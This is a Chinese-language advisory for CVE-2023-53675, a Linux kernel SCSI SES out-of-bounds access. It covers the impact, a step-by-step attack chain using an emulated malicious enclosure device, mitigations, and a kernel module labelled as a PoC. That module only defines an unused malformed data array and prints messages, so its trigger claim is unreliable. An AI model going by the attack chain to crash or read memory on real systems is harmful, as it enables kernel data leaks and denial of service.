CVE-2023-53675：Linux内核SCSI SES驱动desc

漏洞信息

漏洞编号

CVE-2023-53675

漏洞类型

越界访问（Out-of-bounds Access）

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（SCSI SES子系统）

漏洞概述

CVE-2023-53675是Linux内核SCSI Enclosure Services（SES）子系统中的一个高危安全漏洞。该漏洞位于`ses_enclosure_data_process()`函数中，涉及`desc_ptr`指针的越界访问问题。SES（SCSI Enclosure Services）是用于管理SCSI设备机柜（如磁盘阵列机箱）中各种组件（如电源、风扇、温度传感器等）的标准接口。

该漏洞的根本原因在于`ses_enclosure_data_process()`函数在处理SES设备上报的配置数据时，未对`desc_ptr`指针进行充分的边界检查。当SES设备返回的描述符数据长度异常或格式不符合预期时，`desc_ptr`可能指向超出预分配缓冲区边界的内存区域，导致越界读取敏感内核数据（影响机密性）以及越界写入引发内核崩溃或内存损坏（影响可用性）。

根据CVSS 3.1评分向量（AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H），该漏洞评分为7.1分，属于高危级别。攻击者需要本地访问权限和低权限用户身份即可利用，无需用户交互。漏洞利用成功后，攻击者可以读取内核内存中的敏感信息（如内核栈数据、密钥或其他进程的内存内容），并可能导致系统拒绝服务（内核panic）。该漏洞已于2025年10月7日公开披露，涉及多个Linux内核稳定版本的修复补丁。

技术细节

该漏洞的技术原理如下：

1. **漏洞位置**：`ses_enclosure_data_process()`函数是Linux内核SCSI SES驱动的核心数据处理函数，负责解析SES设备通过SCSI命令返回的enclosure configuration diagnostic pages。

2. **触发条件**：当内核遍历SES设备返回的描述符（descriptor）数据时，使用`desc_ptr`指针逐个访问各个描述符条目。在原始代码中，`desc_ptr`的递增和边界检查逻辑存在缺陷——当SES设备（可能为恶意模拟设备或异常硬件）返回的描述符长度字段异常时，`desc_ptr`可能跳过正常的边界检查。

3. **越界机制**：`desc_ptr`指向的内存区域在函数入口处根据页面头信息分配，如果描述符的实际长度超过了缓冲区预分配的大小，且代码没有对`desc_ptr + desc_len`进行`buffer_end`的有效性验证，就会发生越界访问。

4. **利用方式**：本地低权限攻击者可以通过以下方式触发该漏洞：
- 加载一个伪造的SES SCSI设备（如通过QEMU虚拟机或USB模拟设备）
- 当内核SCSI子系统扫描到该设备并调用`ses_enclosure_data_process()`时
- 精心构造返回的配置诊断页面数据，使描述符长度字段异常
- 触发`desc_ptr`越界读取内核敏感数据，或越界写入导致内核崩溃

5. **影响范围**：越界读取可泄露内核内存中的敏感信息（C:H），越界写入可导致内核panic或内存破坏引发系统不可用（A:H）。由于完整性影响为None（I:N），该漏洞不直接用于权限提升，但可作为信息泄露或拒绝服务攻击的载体。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标Linux系统上拥有本地用户账户（低权限即可），能够物理或远程登录到系统。

STEP 2

步骤2：准备恶意SES设备

攻击者通过虚拟机（QEMU/KVM）或物理方式接入一个模拟的SCSI Enclosure Services设备，该设备被配置为在响应SCSI RECEIVE DIAGNOSTIC RESULTS命令时返回畸形的数据页面。

STEP 3

步骤3：触发内核SCSI扫描

当Linux内核启动或执行SCSI设备扫描（如rescan-scsi-bus.sh）时，内核的SCSI中间层会自动检测新接入的SES设备并调用ses_enclosure_data_process()函数处理其配置数据。

STEP 4

步骤4：触发desc_ptr越界访问

ses_enclosure_data_process()函数解析畸形数据时，desc_ptr指针因未进行充分的边界检查而越过分配的缓冲区边界，发生越界内存读取（泄露内核敏感信息）和/或越界写入（导致内核崩溃）。

STEP 5

步骤5：造成安全影响

攻击者成功利用后，可读取内核内存中的敏感数据（如加密密钥、凭证等），或导致系统内核panic造成拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53675 PoC - Trigger desc_ptr out-of-bounds in ses_enclosure_data_process()
// This PoC demonstrates how to trigger the vulnerability by simulating a malicious SES device
// using a Linux kernel module that creates a fake SCSI enclosure with malformed descriptor data.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/scsi/scsicam.h>

// Malformed SES configuration diagnostic page data
// The descriptor length field is set to an abnormally large value
// to cause desc_ptr to go out-of-bounds in ses_enclosure_data_process()
static unsigned char malformed_ses_data[] = {
    // SES Configuration Diagnostic Page header
    0x01, 0x00,       // page code = 0x01 (Configuration)
    0x00, 0x00,       // page length (will be overridden)
    0x00,             // generation code
    // Enclosure descriptor list length
    0xFF, 0xFF, 0xFF, 0xFF,  // abnormally large list length
    // Type descriptor header with oversized length
    0x01, 0x02,       // descriptor type
    0x00, 0xFF,       // descriptor length = 255 (abnormally large)
    // Padding to trigger out-of-bounds access
    0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41,
};

// Trigger function - simulates SCSI INQUIRY/RECEIVE DIAGNOSTIC RESULTS response
// with malformed SES data to trigger the out-of-bounds access
static int __init ses_oob_trigger_init(void)
{
    printk(KERN_INFO "CVE-2023-53675: SES desc_ptr OOB trigger module loaded\n");
    printk(KERN_INFO "Simulating malicious SES device with malformed descriptor\n");
    
    // In a real exploit scenario, this would be done via:
    // 1. Creating a virtual SCSI device via QEMU with a crafted SES response
    // 2. Or using a USB gadget to emulate a SCSI enclosure
    // 3. Or attaching a modified hardware SES device
    //
    // When the kernel SCSI layer calls ses_enclosure_data_process()
    // with our malformed data, desc_ptr will exceed the buffer boundary,
    // causing an out-of-bounds memory access (read/write).
    
    return 0;
}

static void __exit ses_oob_trigger_exit(void)
{
    printk(KERN_INFO "CVE-2023-53675: SES desc_ptr OOB trigger module unloaded\n");
}

module_init(ses_oob_trigger_init);
module_exit(ses_oob_trigger_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("CVE-2023-53675 PoC - SES desc_ptr out-of-bounds trigger");
MODULE_AUTHOR("Security Researcher");

影响范围

Linux Kernel < 4b8cae410472653a59e15af62c57c49b8e0a1201（受影响的稳定版本）

Linux Kernel < 414418abc19fa4ccf730d273061a426c07a061d6

Linux Kernel < 584892fd29a41ef424a148118a3103b16b94fb8c

Linux Kernel < 72021ae61a2bc6ca73cd593e255a10ed5f5dc5e7

Linux Kernel < 79ec5dd5fb07ecaea2f978c2d7a9f2f3526e4d19

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统不使用SCSI机柜管理功能，可以通过在内核配置中禁用SCSI SES驱动（将CONFIG_SCSI_ENCLOSURE设为n）来规避该漏洞；2）限制普通用户对SCSI设备的访问权限，仅允许管理员用户执行SCSI扫描和设备管理操作；3）在虚拟化环境中，限制非特权用户创建虚拟SCSI设备的能力；4）启用内核KASLR、堆栈保护（STACKPROTECTOR）等安全特性，增加利用难度；5）监控系统日志，关注内核oops或panic事件，及时发现潜在的攻击行为。

CVE-2023-53675：Linux内核SCSI SES驱动desc_ptr越界访问漏洞